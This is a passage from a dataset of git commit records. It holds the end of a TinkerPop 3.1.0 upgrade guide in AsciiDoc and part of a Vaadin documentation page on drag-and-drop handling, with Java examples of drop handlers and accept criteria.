link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-913[TINKERPOP3-913]\n\nThreadLocal Transaction Settings\n++++++++++++++++++++++++++++++++\n\nIf a driver configures the `Transaction.onReadWrite()` or `Transaction.onClose()` settings, note that these settings no\nlonger apply to all future requests. If the settings are changed for a sessionless request they will only apply to\nthat one request. If the settings are changed from an in-session request they will only apply to all future requests\nmade in the scope of that session.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-885[TINKERPOP3-885]","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\nTinkerPop 3.1.0\n===============\n\nimage::https:\/\/raw.githubusercontent.com\/apache\/incubator-tinkerpop\/master\/docs\/static\/images\/gremlin-gangster.png[width=225]\n\n*A 187 On The Undercover Gremlinz*\n\nTinkerPop 3.1.0\n---------------\n\n*Release Date: NOT OFFICIALLY RELEASED YET*\n\nPlease see the link:https:\/\/github.com\/apache\/incubator-tinkerpop\/blob\/3.1.0-incubating\/CHANGELOG.asciidoc#XXXXXXXXXXXXXXXXXXXXXXXXXXXX[changelog-(NOT FINAL)] for a complete list of all the modifications that are part of this release.\n\nAdditional upgrade information can be found here:\n\n* <<_tinkerpop_3_0_2,TinkerPop 3.0.2>>\n* <<_tinkerpop_3_0_1,TinkerPop 3.0.1>>\n\nUpgrading for Users\n~~~~~~~~~~~~~~~~~~~\n\nShading Jackson\n^^^^^^^^^^^^^^^\n\nThe Jackson library is now shaded to `gremlin-shaded`, which will allow Jackson to version independently without\nbreaking compatibility with dependent libraries or with those who depend on TinkerPop. The downside is that if a\nlibrary depends on TinkerPop and uses the Jackson classes, those classes will no longer exist with the standard\nJackson package naming. They will have to shifted as follows:\n\n* `org.objenesis` becomes `org.apache.tinkerpop.shaded.objenesis`\n* `com.esotericsoftware.minlog` becomes `org.apache.tinkerpop.shaded.minlog`\n* `com.fasterxml.jackson` becomes `org.apache.tinkerpop.shaded.jackson`\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-835[TINKERPOP3-835]\n\nPartitionStrategy and VertexProperty\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n`PartitionStrategy` now supports partitioning within `VertexProperty`. The `Graph` needs to be able to support\nmeta-properties for this feature to work.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-333[TINKERPOP3-333]\n\nGremlin Server and Epoll\n^^^^^^^^^^^^^^^^^^^^^^^^\n\nGremlin Server provides a configuration option to turn on support for Netty\nlink:http:\/\/netty.io\/wiki\/native-transports.html[native transport] on Linux, which has been shown to help improve\nperformance.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-901[TINKERPOP3-901]\n\nRebindings Deprecated\n^^^^^^^^^^^^^^^^^^^^^\n\nThe notion of \"rebindings\" has been deprecated in favor of the term \"aliases\". Alias is a better and more intuitive\nterm than rebindings which should make it easier for newcomers to understand what they are for.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-913[TINKERPOP3-913],\nlink:http:\/\/tinkerpop.incubator.apache.org\/docs\/3.1.0-incubating\/#_aliases[Reference Documentation - Aliases]\n\nConfigurable Driver Channelizer\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe Gremlin Driver now allows the `Channerlizer` to be supplied as a configuration, which means that custom\nimplementations may be supplied.\n\nSee: https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-680[TINKERPOP3-680]\n\nGraphSON and Strict Option\n^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `GraphMLReader` now has a `strict` option on the `Builder` so that if a data type for a value is invalid in some\nway, GraphMLReader will simply skip that problem value. In that way, it is a bit more forgiving than before especially\nwith empty data.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-756[TINKERPOP3-756]\n\nTransaction.close() Default Behavior\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe default behavior of `Transaction.close()` is to rollback the transaction. This is in contrast to previous versions\nwhere the default behavior was commit. Using rollback as the default should be thought of as a like a safer approach\nto closing where a user must now explicitly call `commit()` to persist their mutations.\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-805[TINKERPOP3-805] for more information.\n\nThreadLocal Transaction Settings\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `Transaction.onReadWrite()` and `Transaction.onClose()` settings now need to be set for each thread (if another\nbehavior than the default is desired). For gremlin-server users that may be changing these settings via scripts.\nIf the settings are changed for a sessionless request they will now only apply to that one request. If the settings are\nchanged for an in-session request they will now only apply to all future requests made in the scope of that session.\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-885[TINKERPOP3-885]\n\nHadoop-Gremlin\n^^^^^^^^^^^^^^\n\n* Hadoop1 is no longer supported. Hadoop2 is now the only supported Hadoop version in TinkerPop.\n* Spark and Giraph have been split out of Hadoop-Gremlin into their own respective packages (Spark-Gremlin and Giraph-Gremlin).\n* The directory where application jars are stored in HDFS is now `hadoop-gremlin-x.y.z-libs`.\n** This versioning is important so that cross-version TinkerPop use does not cause jar conflicts.\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-616\n\nSpark-Gremlin\n^^^^^^^^^^^^^\n\n* Providers that wish to reuse a graphRDD can leverage the new `PersistedInputRDD` and `PersistedOutputRDD`.\n** This allows the graphRDD to avoid serialization into HDFS for reuse. Be sure to enabled persisted `SparkContext` (see documentation).\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-868,\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-925\n\nTinkerGraph Serialization\n^^^^^^^^^^^^^^^^^^^^^^^^^\n\nTinkerGraph is serializable over Gryo, which means that it can shipped over the wire from Gremlin Server. This\nfeature can be useful when working with remote subgraphs.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-728[TINKERPOP3-728]\n\nDeprecation in TinkerGraph\n^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `public static String` configurations have been renamed. The old `public static` variables have been deprecated.\nIf the deprecated variables were being used, then convert to the replacements as soon as possible.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-926[TINKERPOP3-926]\n\nDeprecation in Gremlin-Groovy\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe closure wrappers classes `GFunction`, `GSupplier`, `GConsumer` have been deprecated. In Groovy, a closure can be\nspecified using `as Function` and thus, these wrappers are not needed. Also, the `GremlinExecutor.promoteBindings()`\nmethod which was previously deprecated has been removed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-879[TINKERPOP3-879],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-897[TINKERPOP3-897]\n\nGephi Traversal Visualization\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe process for visualizing a traversal has been simplified. There is no longer a need to \"name\" steps that will\nrepresent visualization points for Gephi. It is possible to just \"configure\" a `visualTraversal` in the console:\n\n[source,text]\ngremlin> :remote config visualTraversal graph vg\n\nwhich creates a special `TraversalSource` from `graph` called `vg`. The traversals created from `vg` can be used\nto `:submit` to Gephi.\n\nSee: link:http:\/\/tinkerpop.incubator.apache.org\/docs\/3.1.0-SNAPSHOT\/#gephi-plugin[Reference Documentation - Gephi]\n\nAlterations to GraphTraversal\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThere were a number of changes to `GraphTraversal`. Many of the changes came by way of deprecation, but some semantics\nhave changed as well:\n\n* `ConjunctionStrategy` has been renamed to `ConnectiveStrategy` (no other behaviors changed).\n* `ConjunctionP` has been renamed to `ConnectiveP` (no other behaviors changed).\n* `DedupBijectionStrategy` has been renamed (and made more effective) as `FilterRankingStrategy`.\n* The `GraphTraversal` mutation API has change significantly with all previous methods being supported but deprecated.\n** The general pattern used now is `addE('knows').from(select('a')).to(select('b')).property('weight',1.0)`.\n* The `GraphTraversal` sack API has changed with all previous methods being supported but deprecated.\n** The old `sack(mult,'weight')` is now `sack(mult).by('weight')`.\n* `GroupStep` has been redesigned such that there is now only a key- and value-traversal. No more reduce-traversal.\n** The previous `group()`-methods have been renamed to `groupV3d0()`. To immediately upgrade, rename all your `group()`-calls to `groupV3d0()`.\n** To migrate to the new `group()`-methods, what was `group().by('age').by(outE()).by(sum(local))` is now `group().by('age').by(outE().sum())`.\n* There was a bug in `fold()`, where if a bulked traverser was provided, the traverser was only represented once.\n** This bug fix might cause a breaking change to a user query if the non-bulk behavior was being counted on. If so, used `dedup()` prior to `fold()`.\n* Both `GraphTraversal().mapKeys()` and `GraphTraversal.mapValues()` has been deprecated.\n** Use `select(keys)` and `select(columns)`. However, note that `select()` will not unroll the keys\/values. Thus, `mapKeys()` => `select(keys).unfold()`.\n* The data type of `Operator` enums will now always be the highest common data type of the two given numbers, rather than the data type of the first number, as it's been before.\n\nAliasing Remotes in the Console\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `:remote` command in Gremlin Console has a new `alias` configuration option. This `alias` option allows\nspecification of a set of key\/value alias\/binding pairs to apply to the remote. In this way, it becomes possible\nto refer to a variable on the server as something other than what it is referred to for purpose of the submitted\nscript. For example once a `:remote` is created, this command:\n\n[source,text]\n:remote alias x g\n\nwould allow \"g\" on the server to be referred to as \"x\".\n\n[source,text]\n:> x.E().label().groupCount()\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-914[TINKERPOP3-914]\n\nUpgrading for Providers\n~~~~~~~~~~~~~~~~~~~~~~~\n\nIMPORTANT: It is recommended that providers also review all the upgrade instructions specified for users. Many of the\nchanges there may prove important for the provider's implementation.\n\nAll providers should be aware that Jackson is now shaded to `gremlin-shaded` and could represent breaking change if\nthere was usage of the dependency by way of TinkerPop, a direct dependency to Jackson may be required on the\nprovider's side.\n\nGraph System Providers\n^^^^^^^^^^^^^^^^^^^^^^\n\nGraphStep Alterations\n+++++++++++++++++++++\n\n* `GraphStep` is no longer in `sideEffect`-package, but now in `map`-package as traversals support mid-traversal `V()`.\n* Traversals now support mid-traversal `V()`-steps. Graph system providers should ensure that a mid-traversal `V()` can leverage any suitable index.\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-762\n\nDecomposition of AbstractTransaction\n++++++++++++++++++++++++++++++++++++\n\nThe `AbstractTransaction` class has been abstracted into two different classes supporting two different modes of\noperation: `AbstractThreadLocalTransaction` and `AbstractThreadedTransaction`, where the former should be used when\nsupporting `ThreadLocal` transactions and the latter for threaded transactions. Of course, providers may still\nchoose to build their own implementation on `AbstractTransaction` itself or simply implement the `Transaction`\ninterface.\n\nThe `AbstractTransaction` gains the following methods to potentially implement (though default implementations\nare supplied in `AbstractThreadLocalTransaction` and `AbstractThreadedTransaction`):\n\n* `doReadWrite` that should execute the read-write consumer.\n* `doClose` that should execute the close consumer.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-765[TINKERPOP3-765],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-885[TINKERPOP3-885]\n\nTransaction.close() Default Behavior\n++++++++++++++++++++++++++++++++++++\n\nThe default behavior for `Transaction.close()` is to rollback the transaction and is enforced by tests, which\npreviously asserted the opposite (i.e. commit on close). These tests have been renamed to suite the new semantics:\n\n* `shouldCommitOnCloseByDefault` became `shouldCommitOnCloseWhenConfigured`\n* `shouldRollbackOnCloseWhenConfigured` became `shouldRollbackOnCloseByDefault`\n\nIf these tests were referenced in an `OptOut`, then their names should be updated.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-805[TINKERPOP3-805]\n\nGraph Traversal Updates\n+++++++++++++++++++++++\n\nThere were numerous changes to the `GraphTraversal` API. Nearly all changes are backwards compatible with respective\n\"deprecated\" annotations. Please review the respective updates specified in the \"Graph System Users\" section.\n\n* `GraphStep` is no longer in `sideEffect` package. Now in `map` package.\n* Make sure mid-traversal `GraphStep` calls are folding `HasContainers` in for index-lookups.\n* Think about copying `TinkerGraphStepStrategyTest` for your implementation so you know folding is happening correctly.\n\nElement Removal\n+++++++++++++++\n\n`Element.Exceptions.elementAlreadyRemoved` has been deprecated and test enforcement for consistency have been removed.\n Providers are free to deal with deleted elements as they see fit.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-297[TINKERPOP3-297]\n\nVendorOptimizationStrategy Rename\n+++++++++++++++++++++++++++++++++\n\nThe `VendorOptimizationStrategy` has been renamed to `ProviderOptimizationStrategy`. This renaming is consistent\nwith revised terminology for what were formerly referred to as \"vendors\".\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-876[TINKERPOP3-876]\n\nGraphComputer Updates\n+++++++++++++++++++++\n\n`GraphComputer.configure(String key, Object value)` is now a method (with default implementation).\nThis allows the user to specify engine-specific parameters to the underlying OLAP system. These parameters are not intended\nto be cross engine supported. Moreover, if there are not parameters that can be altered (beyond the standard `GraphComputer`\nmethods), then the provider's `GraphComputer` implementation should simply return and do nothing.\n\nDriver Providers\n^^^^^^^^^^^^^^^^\n\nAliases Parameter\n+++++++++++++++++\n\nThe \"rebindings\" argument to the \"standard\" `OpProcessor` has been renamed to \"aliases\". While \"rebindings\" is still\nsupported it is recommended that the upgrade to \"aliases\" be made as soon as possible as support will be removed in\nthe future. Gremlin Server will not accept both parameters at the same time - a request must contain either one\nparameter or the other if either is supplied.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-913[TINKERPOP3-913]\n\nThreadLocal Transaction Settings\n++++++++++++++++++++++++++++++++\n\nIf a driver configures the `Transaction.onReadWrite()` or `Transaction.onClose()` settings, note that these settings no\nlonger apply to all future requests. If the settings are changed for a sessionless request they will only apply to\nthat one request. If the settings are changed from an in-session request they will only apply to all future requests\nmade in the scope of that session.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-885[TINKERPOP3-885]","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"39b2142869f8b890eb451ae68ba0ad19bbb0ff63","subject":"Update advanced-dragndrop.asciidoc","message":"Update advanced-dragndrop.asciidoc\n\nError on formatting at line 299\n\nChange-Id: I8ca16880dd77def9e01b5d51c3186cb0ed4fba41\n","repos":"asashour\/framework,peterl1084\/framework,Legioth\/vaadin,kironapublic\/vaadin,jdahlstrom\/vaadin.react,Legioth\/vaadin,asashour\/framework,mstahv\/framework,jdahlstrom\/vaadin.react,Darsstar\/framework,jdahlstrom\/vaadin.react,Darsstar\/framework,mstahv\/framework,kironapublic\/vaadin,Darsstar\/framework,Darsstar\/framework,asashour\/framework,peterl1084\/framework,kironapublic\/vaadin,mstahv\/framework,peterl1084\/framework,mstahv\/framework,asashour\/framework,jdahlstrom\/vaadin.react,mstahv\/framework,kironapublic\/vaadin,asashour\/framework,jdahlstrom\/vaadin.react,peterl1084\/framework,Legioth\/vaadin,kironapublic\/vaadin,Legioth\/vaadin,peterl1084\/framework,Legioth\/vaadin,Darsstar\/framework","old_file":"documentation\/advanced\/advanced-dragndrop.asciidoc","new_file":"documentation\/advanced\/advanced-dragndrop.asciidoc","new_contents":"---\ntitle: Drag and Drop\norder: 12\nlayout: page\n---\n\n[[advanced.dragndrop]]\n= Drag and Drop\n\n(((\"Drag and Drop\", id=\"term.advanced.dragndrop\", range=\"startofrange\")))\n\n\nDragging an object from one location to another by grabbing it with mouse,\nholding the mouse button pressed, and then releasing the button to \"drop\" it to\nthe other location is a common way to move, copy, or associate objects. For\nexample, most operating systems allow dragging and dropping files between\nfolders or dragging a document on a program to open it. In Vaadin, it is\npossible to drag and drop components and parts of certain components.\n\nDragged objects, or __transferables__, are essentially data objects. You can\ndrag and drop rows in [classname]#Table# and nodes in [classname]#Tree#\ncomponents, either within or between the components. You can also drag entire\ncomponents by wrapping them inside [classname]#DragAndDropWrapper#.\n\nDragging starts from a __drag source__, which defines the transferable.\nTransferables implement the [classname]#Transferable# interfaces. For trees and\ntables, which are bound to [classname]#Container# data sources, a node or row\ntransferable is a reference to an [classname]#Item# in the Vaadin Data Model.\nDragged components are referenced with a [classname]#WrapperTransferable#.\nStarting dragging does not require any client-server communication, you only\nneed to enable dragging. All drag and drop logic occurs in two operations:\ndetermining ( __accepting__) where dropping is allowed and actually dropping.\nDrops can be done on a __drop target__, which implements the\n[classname]#DropTarget# interface. Three components implement the interface:\n[classname]#Tree#, [classname]#Table#, and [classname]#DragAndDropWrapper#.\nThese accept and drop operations need to be provided in a __drop handler__.\nEssentially all you need to do to enable drag and drop is to enable dragging in\nthe drag source and implement the [methodname]#getAcceptCriterion()# and\n[methodname]#drop()# methods in the [classname]#DropHandler# interface.\n\nThe client-server architecture of Vaadin causes special requirements for the\ndrag and drop functionality. The logic for determining where a dragged object\ncan be dropped, that is, __accepting__ a drop, should normally be done on the\nclient-side, in the browser. Server communications are too slow to have much of\nsuch logic on the server-side. The drag and drop feature therefore offers a\nnumber of ways to avoid the server communications to ensure a good user\nexperience.\n\n[[advanced.dragndrop.drophandler]]\n== Handling Drops\n\nMost of the user-defined drag and drop logic occurs in a __drop handler__, which\nis provided by implementing the [methodname]#drop()# method in the\n[classname]#DropHandler# interface. A closely related definition is the drop\naccept criterion, which is defined in the [methodname]#getAcceptCriterion()#\nmethod in the same interface. It is described in\n<<advanced.dragndrop.acceptcriteria>> later.\n\nThe [methodname]#drop()# method gets a [classname]#DragAndDropEvent# as its\nparameters. The event object provides references to two important object:\n[classname]#Transferable# and [classname]#TargetDetails#.\n\nA [classname]#Transferable# contains a reference to the object (component or\ndata item) that is being dragged. A tree or table item is represented as a\n[classname]#TreeTransferable# or [classname]#TableTransferable# object, which\ncarries the item identifier of the dragged tree or table item. These special\ntransferables, which are bound to some data in a container, are\n[classname]#DataBoundTransferable#. Dragged components are represented as\n[classname]#WrapperTransferable# objects, as the components are wrapped in a\n[classname]#DragAndDropWrapper#.\n\nThe [classname]#TargetDetails# object provides information about the exact\nlocation where the transferable object is being dropped. The exact class of the\ndetails object depends on the drop target and you need to cast it to the proper\nsubclass to get more detailed information. If the target is selection component,\nessentially a tree or a table, the [classname]#AbstractSelectTargetDetails#\nobject tells the item on which the drop is being made. For trees, the\n[classname]#TreeTargetDetails# gives some more details. For wrapped components,\nthe information is provided in a [classname]#WrapperDropDetails# object. In\naddition to the target item or component, the details objects provide a __drop\nlocation__. For selection components, the location can be obtained with the\n[methodname]#getDropLocation()# and for wrapped components with\n[methodname]#verticalDropLocation()# and [methodname]#horizontalDropLocation()#.\nThe locations are specified as either [classname]#VerticalDropLocation# or\n[classname]#HorizontalDropLocation# objects. The drop location objects specify\nwhether the transferable is being dropped above, below, or directly on (at the\nmiddle of) a component or item.\n\nDropping on a [classname]#Tree#, [classname]#Table#, and a wrapped component is\nexplained further in the following sections.\n\n\n[[advanced.dragndrop.treedrop]]\n== Dropping Items On a [classname]#Tree#\n\nYou can drag items from, to, or within a [classname]#Tree#. Making tree a drag\nsource requires simply setting the drag mode with [methodname]#setDragMode()#.\n[classname]#Tree# currently supports only one drag mode,\n[literal]#++TreeDragMode.NODE++#, which allows dragging single tree nodes. While\ndragging, the dragged node is referenced with a [classname]#TreeTransferable#\nobject, which is a [classname]#DataBoundTransferable#. The tree node is\nidentified by the item ID of the container item.\n\nWhen a transferable is dropped on a tree, the drop location is stored in a\n[classname]#TreeTargetDetails# object, which identifies the target location by\nitem ID of the tree node on which the drop is made. You can get the item ID with\n[methodname]#getItemIdOver()# method in\n[classname]#AbstractSelectTargetDetails#, which the\n[classname]#TreeTargetDetails# inherits. A drop can occur directly on or above\nor below a node; the exact location is a [classname]#VerticalDropLocation#,\nwhich you can get with the [methodname]#getDropLocation()# method.\n\nIn the example below, we have a [classname]#Tree# and we allow reordering the\ntree items by drag and drop.\n\n\n[source, java]\n----\nfinal Tree tree = new Tree(\"Inventory\");\ntree.setContainerDataSource(TreeExample.createTreeContent());\nlayout.addComponent(tree);\n \n\/\/ Expand all items\nfor (Iterator<?> it = tree.rootItemIds().iterator(); it.hasNext();)\n tree.expandItemsRecursively(it.next());\n \n\/\/ Set the tree in drag source mode\ntree.setDragMode(TreeDragMode.NODE);\n \n\/\/ Allow the tree to receive drag drops and handle them\ntree.setDropHandler(new DropHandler() {\n public AcceptCriterion getAcceptCriterion() {\n return AcceptAll.get();\n }\n\n public void drop(DragAndDropEvent event) {\n \/\/ Wrapper for the object that is dragged\n Transferable t = event.getTransferable();\n \n \/\/ Make sure the drag source is the same tree\n if (t.getSourceComponent() != tree)\n return;\n \n TreeTargetDetails target = (TreeTargetDetails)\n event.getTargetDetails();\n\n \/\/ Get ids of the dragged item and the target item\n Object sourceItemId = t.getData(\"itemId\");\n Object targetItemId = target.getItemIdOver();\n\n \/\/ On which side of the target the item was dropped \n VerticalDropLocation location = target.getDropLocation();\n \n HierarchicalContainer container = (HierarchicalContainer)\n tree.getContainerDataSource();\n\n \/\/ Drop right on an item -> make it a child\n if (location == VerticalDropLocation.MIDDLE)\n tree.setParent(sourceItemId, targetItemId);\n\n \/\/ Drop at the top of a subtree -> make it previous\n else if (location == VerticalDropLocation.TOP) {\n Object parentId = container.getParent(targetItemId);\n container.setParent(sourceItemId, parentId);\n container.moveAfterSibling(sourceItemId, targetItemId);\n container.moveAfterSibling(targetItemId, sourceItemId);\n }\n \n \/\/ Drop below another item -> make it next \n else if (location == VerticalDropLocation.BOTTOM) {\n Object parentId = container.getParent(targetItemId);\n container.setParent(sourceItemId, parentId);\n container.moveAfterSibling(sourceItemId, targetItemId);\n }\n }\n});\n----\n\n[[advanced.dragndrop.treedrop.criteria]]\n=== Accept Criteria for Trees\n\n[classname]#Tree# defines some specialized accept criteria for trees.\n\n[classname]#TargetInSubtree#(client-side):: Accepts if the target item is in the specified sub-tree. The sub-tree is specified by the item ID of the root of the sub-tree in the constructor. The second constructor includes a depth parameter, which specifies how deep from the given root node are drops accepted. Value [literal]#++-1++# means infinite, that is, the entire sub-tree, and is therefore the same as the simpler constructor.\n[classname]#TargetItemAllowsChildren#(client-side):: Accepts a drop if the tree has [methodname]#setChildrenAllowed()# enabled for the target item. The criterion does not require parameters, so the class is a singleton and can be acquired with [methodname]#Tree.TargetItemAllowsChildren.get()#. For example, the following composite criterion accepts drops only on nodes that allow children, but between all nodes: \n+\n[source, java]\n----\nreturn new Or (Tree.TargetItemAllowsChildren.get(), new Not(VerticalLocationIs.MIDDLE));\n----\n\n[classname]#TreeDropCriterion#(server-side):: Accepts drops on only some items, which as specified by a set of item IDs. You must extend the abstract class and implement the [methodname]#getAllowedItemIds()# to return the set. While the criterion is server-side, it is lazy-loading, so that the list of accepted target nodes is loaded only once from the server for each drag operation. See <<advanced.dragndrop.acceptcriteria>> for an example.\n\n\nIn addition, the accept criteria defined in [classname]#AbstractSelect# are\navailable for a [classname]#Tree#, as listed in\n<<advanced.dragndrop.acceptcriteria>>.\n\n\n\n[[advanced.dragndrop.tabledrop]]\n== Dropping Items On a [classname]#Table#\n\nYou can drag items from, to, or within a [classname]#Table#. Making table a drag\nsource requires simply setting the drag mode with [methodname]#setDragMode()#.\n[classname]#Table# supports dragging both single rows, with\n[literal]#++TableDragMode.ROW++#, and multiple rows, with\n[literal]#++TableDragMode.MULTIROW++#. While dragging, the dragged node or nodes\nare referenced with a [classname]#TreeTransferable# object, which is a\n[classname]#DataBoundTransferable#. Tree nodes are identified by the item IDs of\nthe container items.\n\nWhen a transferable is dropped on a table, the drop location is stored in a\n[classname]#AbstractSelectTargetDetails# object, which identifies the target row\nby its item ID. You can get the item ID with [methodname]#getItemIdOver()#\nmethod. A drop can occur directly on or above or below a row; the exact location\nis a [classname]#VerticalDropLocation#, which you can get with the\n[methodname]#getDropLocation()# method from the details object.\n\n[[advanced.dragndrop.tabledrop.criteria]]\n=== Accept Criteria for Tables\n\n[classname]#Table# defines one specialized accept criterion for tables.\n\n[classname]#TableDropCriterion#(server-side):: Accepts drops only on (or above or below) items that are specified by a set of item IDs. You must extend the abstract class and implement the [methodname]#getAllowedItemIds()# to return the set. While the criterion is server-side, it is lazy-loading, so that the list of accepted target items is loaded only once from the server for each drag operation.\n\n\n\n\n[[advanced.dragndrop.acceptcriteria]]\n== Accepting Drops\n\n(((\"Drag and Drop\", \"Accept Criteria\", id=\"term.advanced.dragndrop.acceptcriteria\", range=\"startofrange\")))\n\n\nYou can not drop the objects you are dragging around just anywhere. Before a\ndrop is possible, the specific drop location on which the mouse hovers must be\n__accepted__. Hovering a dragged object over an accepted location displays an\n__accept indicator__, which allows the user to position the drop properly. As\nsuch checks have to be done all the time when the mouse pointer moves around the\ndrop targets, it is not feasible to send the accept requests to the server-side,\nso drops on a target are normally accepted by a client-side __accept\ncriterion__.\n\nA drop handler must define the criterion on the objects which it accepts to be\ndropped on the target. The criterion needs to be provided in the\n[classname]#getAcceptCriterion()# method of the [classname]#DropHandler#\ninterface. A criterion is represented in an [classname]#AcceptCriterion# object,\nwhich can be a composite of multiple criteria that are evaluated using logical\noperations. There are two basic types of criteria: __client-side__ and\n__server-side criteria__. The various built-in criteria allow accepting drops\nbased on the identity of the source and target components, and on the __data\nflavor__ of the dragged objects.\n\nTo allow dropping any transferable objects, you can return a universal accept\ncriterion, which you can get with [methodname]#AcceptAll.get()#.\n\n\n[source, java]\n----\ntree.setDropHandler(new DropHandler() {\n public AcceptCriterion getAcceptCriterion() {\n return AcceptAll.get();\n }\n ...\n----\n\n[[advanced.dragndrop.acceptcriteria.client-side]]\n=== Client-Side Criteria\n\nThe __client-side criteria__, which inherit the\n[classname]#ClientSideCriterion#, are verified on the client-side, so server\nrequests are not needed for verifying whether each component on which the mouse\npointer hovers would accept a certain object.\n\nThe following client-side criteria are define in\n[package]#com.vaadin.event.dd.acceptcriterion#:\n\n[classname]#AcceptAll#:: Accepts all transferables and targets.\n[classname]#And#:: Performs the logical AND operation on two or more client-side criteria; accepts the transferable if all the given sub-criteria accept it.\n[classname]#ContainsDataFlavour#:: The transferable must contain the defined data flavour.\n[classname]#Not#:: Performs the logical NOT operation on a client-side criterion; accepts the transferable if and only if the sub-criterion does not accept it.\n[classname]#Or#:: Performs the logical OR operation on two or more client-side criteria; accepts the transferable if any of the given sub-criteria accepts it.\n[classname]#SourceIs#:: Accepts all transferables from any of the given source components\n[classname]#SourceIsTarget#:: Accepts the transferable only if the source component is the same as the target. This criterion is useful for ensuring that items are dragged only within a tree or a table, and not from outside it.\n[classname]#TargetDetailIs#:: Accepts any transferable if the target detail, such as the item of a tree node or table row, is of the given data flavor and has the given value.\n\n\nIn addition, target components such as [classname]#Tree# and [classname]#Table#\ndefine some component-specific client-side accept criteria. See\n<<advanced.dragndrop.treedrop>> for more details.\n\n[classname]#AbstractSelect# defines the following criteria for all selection\ncomponents, including [classname]#Tree# and [classname]#Table#.\n\n[classname]#AcceptItem#:: Accepts only specific items from a specific selection component. The selection component, which must inherit [classname]#AbstractSelect#, is given as the first parameter for the constructor. It is followed by a list of allowed item identifiers in the drag source.\n[classname]#AcceptItem.ALL#:: Accepts all transferables as long as they are items.\n[classname]#TargetItemIs#:: Accepts all drops on the specified target items. The constructor requires the target component ( [classname]#AbstractSelect#) followed by a list of allowed item identifiers.\n[classname]#VerticalLocationIs.MIDDLE#, [classname]#TOP#, and [classname]#BOTTOM#:: The three static criteria accepts drops on, above, or below an item. For example, you could accept drops only in between items with the following: \n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n return new Not(VerticalLocationIs.MIDDLE);\n}\n----\n\n\n\n\n\n[[advanced.dragndrop.acceptcriteria.server-side]]\n=== Server-Side Criteria\n\nThe __server-side criteria__ are verified on the server-side with the\n[methodname]#accept()# method of the [classname]#ServerSideCriterion# class.\nThis allows fully programmable logic for accepting drops, but the negative side\nis that it causes a very large amount of server requests. A request is made for\nevery target position on which the pointer hovers. This problem is eased in many\ncases by the component-specific lazy loading criteria\n[classname]#TableDropCriterion# and [classname]#TreeDropCriterion#. They do the\nserver visit once for each drag and drop operation and return all accepted rows\nor nodes for current [classname]#Transferable# at once.\n\nThe [methodname]#accept()# method gets the drag event as a parameter so it can\nperform its logic much like in [methodname]#drop()#.\n\n\n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n \/\/ Server-side accept criterion that allows drops on any other\n \/\/ location except on nodes that may not have children\n ServerSideCriterion criterion = new ServerSideCriterion() {\n public boolean accept(DragAndDropEvent dragEvent) {\n TreeTargetDetails target = (TreeTargetDetails)\n dragEvent.getTargetDetails();\n\n \/\/ The tree item on which the load hovers\n Object targetItemId = target.getItemIdOver();\n\n \/\/ On which side of the target the item is hovered\n VerticalDropLocation location = target.getDropLocation();\n if (location == VerticalDropLocation.MIDDLE)\n if (! tree.areChildrenAllowed(targetItemId))\n return false; \/\/ Not accepted\n\n return true; \/\/ Accept everything else\n }\n };\n return criterion;\n}\n----\n\nThe server-side criteria base class [classname]#ServerSideCriterion# provides a\ngeneric [methodname]#accept()# method. The more specific\n[classname]#TableDropCriterion# and [classname]#TreeDropCriterion# 